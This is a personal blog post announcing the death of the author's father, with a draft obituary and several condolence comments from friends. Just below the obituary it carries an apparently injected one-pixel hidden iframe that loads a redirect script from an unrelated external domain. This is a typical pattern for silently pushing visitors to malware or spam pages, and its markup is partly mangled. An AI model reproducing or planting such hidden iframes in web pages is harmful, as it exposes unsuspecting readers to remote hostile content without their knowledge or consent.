Posted by: wrmcnutt | January 3, 2010

Dad – Closing In On The Final Update


My father, soldier, fireman, administrator, and always, always a teacher, has passed away. 

The call came at 3:30 in the morning.  It’s two hours later, and I’m not wracked with pain, but I find that I cannot sleep.

For the interested, I will post information regarding a memorial during the next day or so.

UPDATE: Obit draft:

Mr. William R McNutt passed away on Sunday Morning, January 3rd, 2010.  He is survived by his daughter, Shea, son William Jr, and his sister, Doris.  In his time, he was a lifeguard, sailor, soldier, fireman, and administrator, but always a beloved father and brother.  Dad, you will be missed.

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Responses

  1. So very sorry on the loss of your dad. I know this has been a long hard run.

    • Thanks, Bri – It’s been rough, but, it could have been longer and harder.

  2. Keep us up to date –

    Love you –

  3. The pain doesn’t ever really go away, but you will grow stronger so as to better carry it. Hold tight to those you love. Take refuge in those around you. My thoughts are with you. Hugs. – Liz

  4. Martin has been crying off and on about this since your phone call.
    I only met your dad through your stories here on the blog, but I’m glad I knew even that little bit about him.
    Deirdre

  5. I am sorry for your loss Bill, it’s tough when you lose a parent. My thoughts and prayers are with you and Shea.

    Your friend,
    Casey


Leave a Reply

Categories

